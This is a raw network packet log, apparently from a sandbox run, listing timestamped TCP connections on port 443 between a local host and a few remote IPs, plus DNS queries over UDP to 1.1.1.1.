Jan 9, 2025 14:42:53.225682974 CET	443	49814	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.617089033 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.617166996 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.617201090 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.617238998 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.617273092 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.617290020 CET	49813	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:53.617310047 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.617326975 CET	49813	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:53.617348909 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.617360115 CET	49813	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:53.617368937 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.617412090 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.617413044 CET	49813	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:53.617424965 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.617476940 CET	49813	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:53.621834040 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.665292025 CET	49813	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:53.697525024 CET	443	49814	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.698120117 CET	49814	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:53.703244925 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.703515053 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.703546047 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.703568935 CET	49813	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:53.703577995 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.703588963 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.703619003 CET	49813	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:53.703783989 CET	49814	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:53.703799963 CET	443	49814	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.704037905 CET	443	49814	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.704163074 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.704391003 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.704423904 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.704438925 CET	49813	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:53.704447985 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.704463959 CET	49813	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:53.704533100 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.704567909 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.704607964 CET	49813	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:53.704617023 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.704672098 CET	49813	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:53.704931974 CET	49814	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:53.704931974 CET	49814	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:53.704946041 CET	443	49814	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.705354929 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.705413103 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.705447912 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.705457926 CET	49813	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:53.705466986 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.705502987 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.705506086 CET	49813	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:53.705513954 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.705559015 CET	49813	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:53.706042051 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.706099987 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.706151009 CET	49813	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:53.706151962 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.706161976 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.706204891 CET	49813	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:53.706209898 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.706218958 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.706269026 CET	49813	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:53.790949106 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.791174889 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.791205883 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.791234016 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.791271925 CET	49813	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:53.791286945 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.791313887 CET	49813	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:53.791327953 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.791394949 CET	49813	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:53.791402102 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.791587114 CET	49813	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:53.791764975 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.791821003 CET	49813	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:53.791831017 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.791882992 CET	49813	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:53.791888952 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.791975021 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.792114019 CET	49813	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:53.792277098 CET	49813	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:53.792293072 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.792304993 CET	49813	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:53.792309999 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:54.000009060 CET	49815	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:54.000055075 CET	443	49815	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:54.000849009 CET	49815	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:54.001183987 CET	49815	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:54.001202106 CET	443	49815	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:54.015644073 CET	443	49814	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:54.015702009 CET	443	49814	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:54.015852928 CET	49814	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:54.015873909 CET	443	49814	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:54.015919924 CET	49814	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:54.015919924 CET	49814	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:54.015928984 CET	443	49814	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:54.015933037 CET	443	49814	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:54.026245117 CET	49816	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:54.026303053 CET	443	49816	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:54.026421070 CET	49816	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:54.027038097 CET	49816	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:54.027060986 CET	443	49816	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:54.480696917 CET	443	49815	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:54.480798006 CET	49815	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:54.482512951 CET	49815	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:54.482523918 CET	443	49815	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:54.482960939 CET	443	49815	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:54.482968092 CET	443	49816	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:54.483062029 CET	49816	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:54.484026909 CET	49815	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:54.484124899 CET	49815	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:54.484129906 CET	443	49815	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:54.484360933 CET	49816	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:54.484375954 CET	443	49816	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:54.484636068 CET	443	49816	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:54.485510111 CET	49816	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:54.485537052 CET	49816	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:54.485542059 CET	443	49816	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:54.714875937 CET	443	49816	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:54.714943886 CET	443	49816	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:54.715090990 CET	49816	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:54.715143919 CET	443	49816	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:54.715168953 CET	49816	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:54.715168953 CET	49816	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:54.715179920 CET	443	49816	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:54.715193987 CET	443	49816	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:54.817850113 CET	443	49815	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:54.817956924 CET	443	49815	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:54.819220066 CET	49815	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:54.819324970 CET	49815	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:54.819344997 CET	443	49815	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:54.819356918 CET	49815	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:54.819361925 CET	443	49815	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:55.699165106 CET	49817	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:55.699210882 CET	443	49817	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:55.699275970 CET	49817	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:55.699610949 CET	49817	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:55.699620008 CET	443	49817	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:56.182193995 CET	443	49817	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:56.182257891 CET	49817	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:56.184216022 CET	49817	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:56.184223890 CET	443	49817	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:56.184551954 CET	443	49817	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:56.185565948 CET	49817	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:56.185669899 CET	49817	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:56.185697079 CET	443	49817	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:56.185779095 CET	49817	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:56.185806036 CET	443	49817	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:56.185884953 CET	49817	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:56.185913086 CET	443	49817	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:56.277940035 CET	49818	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:56.277992010 CET	443	49818	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:56.278069973 CET	49818	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:56.278414011 CET	49818	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:56.278429031 CET	443	49818	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:56.749200106 CET	443	49817	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:56.749264956 CET	443	49817	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:56.749327898 CET	49817	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:56.754930973 CET	49817	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:56.754951000 CET	443	49817	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:56.754966021 CET	49817	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:56.754971981 CET	443	49817	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:56.758269072 CET	443	49818	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:56.758342981 CET	49818	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:56.760677099 CET	49818	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:56.760689974 CET	443	49818	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:56.761166096 CET	443	49818	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:56.761914015 CET	49818	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:56.803407907 CET	443	49818	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:56.826095104 CET	49818	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:56.826155901 CET	443	49818	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:56.826353073 CET	49818	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:56.826385975 CET	443	49818	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:56.826467991 CET	49818	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:56.826487064 CET	443	49818	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:57.354846954 CET	443	49818	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:57.354912996 CET	443	49818	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:57.355050087 CET	49818	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:57.355103016 CET	443	49818	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:57.355127096 CET	49818	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:57.355127096 CET	49818	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:57.355137110 CET	443	49818	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:57.355144024 CET	443	49818	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:57.473170996 CET	49819	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:57.473233938 CET	443	49819	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:57.473330021 CET	49819	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:57.473659039 CET	49819	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:57.473679066 CET	443	49819	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:57.930428028 CET	443	49819	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:57.930501938 CET	49819	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:57.932049036 CET	49819	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:57.932056904 CET	443	49819	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:57.932291985 CET	443	49819	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:57.933619022 CET	49819	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:57.933840036 CET	49819	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:57.933876991 CET	443	49819	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:57.933964014 CET	49819	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:57.933994055 CET	443	49819	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:57.934144020 CET	49819	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:57.934178114 CET	443	49819	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:57.989661932 CET	49820	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:57.989708900 CET	443	49820	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:57.989775896 CET	49820	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:57.990098000 CET	49820	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:57.990111113 CET	443	49820	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:58.446466923 CET	443	49796	104.126.116.98	192.168.2.8
Jan 9, 2025 14:42:58.446547985 CET	443	49796	104.126.116.98	192.168.2.8
Jan 9, 2025 14:42:58.446942091 CET	49796	443	192.168.2.8	104.126.116.98
Jan 9, 2025 14:42:58.461358070 CET	443	49820	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:58.461467981 CET	49820	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:58.463759899 CET	49820	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:58.463790894 CET	443	49820	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:58.464498997 CET	443	49820	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:58.465662003 CET	49820	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:58.465780973 CET	49820	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:58.465853930 CET	443	49820	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:58.465914965 CET	443	49795	104.126.116.98	192.168.2.8
Jan 9, 2025 14:42:58.466012001 CET	443	49795	104.126.116.98	192.168.2.8
Jan 9, 2025 14:42:58.466058016 CET	49820	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:58.466082096 CET	49795	443	192.168.2.8	104.126.116.98
Jan 9, 2025 14:42:58.466108084 CET	443	49820	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:58.466207981 CET	49820	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:58.466306925 CET	443	49820	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:58.494724989 CET	443	49819	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:58.494790077 CET	443	49819	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:58.494891882 CET	49819	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:58.495362997 CET	49819	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:58.495378017 CET	443	49819	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:58.495572090 CET	49819	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:58.495578051 CET	443	49819	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:58.551678896 CET	443	49800	104.126.116.65	192.168.2.8
Jan 9, 2025 14:42:58.551767111 CET	443	49800	104.126.116.65	192.168.2.8
Jan 9, 2025 14:42:58.551913023 CET	49800	443	192.168.2.8	104.126.116.65
Jan 9, 2025 14:42:58.869677067 CET	49821	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:58.869736910 CET	443	49821	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:58.869992018 CET	49821	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:58.878932953 CET	49821	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:58.878961086 CET	443	49821	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:59.049494982 CET	443	49820	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:59.049563885 CET	443	49820	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:59.049640894 CET	49820	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:59.049778938 CET	49820	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:59.049798012 CET	443	49820	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:59.049819946 CET	49820	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:59.049825907 CET	443	49820	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:59.237355947 CET	49822	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:59.237406015 CET	443	49822	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:59.237750053 CET	49822	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:59.238122940 CET	49822	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:59.238138914 CET	443	49822	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:59.337291002 CET	443	49821	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:59.337414980 CET	49821	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:59.338790894 CET	49821	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:59.338805914 CET	443	49821	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:59.339045048 CET	443	49821	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:59.339840889 CET	49821	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:59.339864969 CET	49821	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:59.339919090 CET	443	49821	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:59.634979963 CET	443	49821	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:59.635056973 CET	443	49821	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:59.635118961 CET	49821	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:59.635257006 CET	49821	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:59.635257006 CET	49821	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:59.635283947 CET	443	49821	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:59.635294914 CET	443	49821	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:59.726304054 CET	443	49822	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:59.726378918 CET	49822	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:59.728065014 CET	49822	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:59.728075027 CET	443	49822	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:59.728324890 CET	443	49822	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:59.729434013 CET	49822	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:59.729516983 CET	49822	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:59.729545116 CET	443	49822	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:59.949548960 CET	443	49822	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:59.949625015 CET	443	49822	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:59.949692011 CET	49822	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:59.949901104 CET	49822	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:59.949919939 CET	443	49822	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:59.949950933 CET	49822	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:59.949958086 CET	443	49822	172.67.174.91	192.168.2.8
Jan 9, 2025 14:43:24.681524992 CET	49793	443	192.168.2.8	204.79.197.219
Jan 9, 2025 14:43:24.681535959 CET	49798	443	192.168.2.8	204.79.197.219
Jan 9, 2025 14:43:24.681548119 CET	443	49793	204.79.197.219	192.168.2.8
Jan 9, 2025 14:43:24.681571007 CET	443	49798	204.79.197.219	192.168.2.8
Jan 9, 2025 14:43:29.589451075 CET	49769	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:43:29.589473963 CET	443	49769	172.64.41.3	192.168.2.8
Jan 9, 2025 14:43:34.656841993 CET	49795	443	192.168.2.8	104.126.116.98
Jan 9, 2025 14:43:34.656881094 CET	443	49795	104.126.116.98	192.168.2.8
Jan 9, 2025 14:43:34.656939983 CET	49796	443	192.168.2.8	104.126.116.98
Jan 9, 2025 14:43:34.656970024 CET	443	49796	104.126.116.98	192.168.2.8
Jan 9, 2025 14:43:34.657004118 CET	49800	443	192.168.2.8	104.126.116.65
Jan 9, 2025 14:43:34.657042027 CET	443	49800	104.126.116.65	192.168.2.8
Jan 9, 2025 14:43:34.657408953 CET	49824	443	192.168.2.8	104.126.116.26
Jan 9, 2025 14:43:34.657444954 CET	443	49824	104.126.116.26	192.168.2.8
Jan 9, 2025 14:43:34.657550097 CET	49824	443	192.168.2.8	104.126.116.26
Jan 9, 2025 14:43:34.657769918 CET	49824	443	192.168.2.8	104.126.116.26
Jan 9, 2025 14:43:34.657783031 CET	443	49824	104.126.116.26	192.168.2.8
Jan 9, 2025 14:43:35.132894993 CET	443	49824	104.126.116.26	192.168.2.8
Jan 9, 2025 14:43:35.133327961 CET	49824	443	192.168.2.8	104.126.116.26
Jan 9, 2025 14:43:35.133353949 CET	443	49824	104.126.116.26	192.168.2.8
Jan 9, 2025 14:43:35.134460926 CET	443	49824	104.126.116.26	192.168.2.8
Jan 9, 2025 14:43:35.134522915 CET	49824	443	192.168.2.8	104.126.116.26
Jan 9, 2025 14:43:35.134926081 CET	49824	443	192.168.2.8	104.126.116.26
Jan 9, 2025 14:43:35.134999990 CET	443	49824	104.126.116.26	192.168.2.8
Jan 9, 2025 14:43:35.183485985 CET	49824	443	192.168.2.8	104.126.116.26
Jan 9, 2025 14:43:35.183500051 CET	443	49824	104.126.116.26	192.168.2.8
Jan 9, 2025 14:43:35.229938030 CET	49824	443	192.168.2.8	104.126.116.26

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 9, 2025 14:41:58.611339092 CET	138	138	192.168.2.8	192.168.2.255
Jan 9, 2025 14:42:19.765161991 CET	51460	53	192.168.2.8	1.1.1.1
Jan 9, 2025 14:42:19.778969049 CET	53	51460	1.1.1.1	192.168.2.8
Jan 9, 2025 14:42:30.317107916 CET	60568	53	192.168.2.8	1.1.1.1
Jan 9, 2025 14:42:30.317524910 CET	65520	53	192.168.2.8	1.1.1.1
Jan 9, 2025 14:42:30.324501991 CET	53	65520	1.1.1.1	192.168.2.8
Jan 9, 2025 14:42:31.565152884 CET	65486	53	192.168.2.8	1.1.1.1
Jan 9, 2025 14:42:31.565306902 CET	63924	53	192.168.2.8	1.1.1.1
Jan 9, 2025 14:42:32.694437027 CET	65216	53	192.168.2.8	1.1.1.1
Jan 9, 2025 14:42:32.701181889 CET	53	65216	1.1.1.1	192.168.2.8
Jan 9, 2025 14:42:32.712301970 CET	63233	53	192.168.2.8	1.1.1.1
Jan 9, 2025 14:42:32.719156027 CET	53	63233	1.1.1.1	192.168.2.8
Jan 9, 2025 14:42:32.724966049 CET	51138	53	192.168.2.8	1.1.1.1
Jan 9, 2025 14:42:32.725229979 CET	55164	53	192.168.2.8	1.1.1.1
Jan 9, 2025 14:42:32.726186037 CET	49433	53	192.168.2.8	1.1.1.1
Jan 9, 2025 14:42:32.726681948 CET	55880	53	192.168.2.8	1.1.1.1
Jan 9, 2025 14:42:32.733370066 CET	53	55880	1.1.1.1	192.168.2.8
Jan 9, 2025 14:42:32.749126911 CET	65470	53	192.168.2.8	1.1.1.1
Jan 9, 2025 14:42:32.749254942 CET	58016	53	192.168.2.8	1.1.1.1
Jan 9, 2025 14:42:32.755827904 CET	53	58016	1.1.1.1	192.168.2.8
Jan 9, 2025 14:42:34.629503965 CET	65411	53	192.168.2.8	1.1.1.1
Jan 9, 2025 14:42:34.629731894 CET	63152	53	192.168.2.8	1.1.1.1
Jan 9, 2025 14:42:34.636698961 CET	53	65411	1.1.1.1	192.168.2.8
Jan 9, 2025 14:42:34.638226032 CET	53	63152	1.1.1.1	192.168.2.8
Jan 9, 2025 14:42:34.732722998 CET	56960	53	192.168.2.8	1.1.1.1
Jan 9, 2025 14:42:34.733145952 CET	54355	53	192.168.2.8	1.1.1.1
Jan 9, 2025 14:42:34.733719110 CET	55117	53	192.168.2.8	1.1.1.1
Jan 9, 2025 14:42:34.733936071 CET	52653	53	192.168.2.8	1.1.1.1
Jan 9, 2025 14:42:34.739418030 CET	53	56960	1.1.1.1	192.168.2.8
Jan 9, 2025 14:42:34.740063906 CET	53	54355	1.1.1.1	192.168.2.8
Jan 9, 2025 14:42:34.740252018 CET	53	55117	1.1.1.1	192.168.2.8
Jan 9, 2025 14:42:34.741003990 CET	53	52653	1.1.1.1	192.168.2.8
Jan 9, 2025 14:42:34.748023987 CET	64553	53	192.168.2.8	1.1.1.1
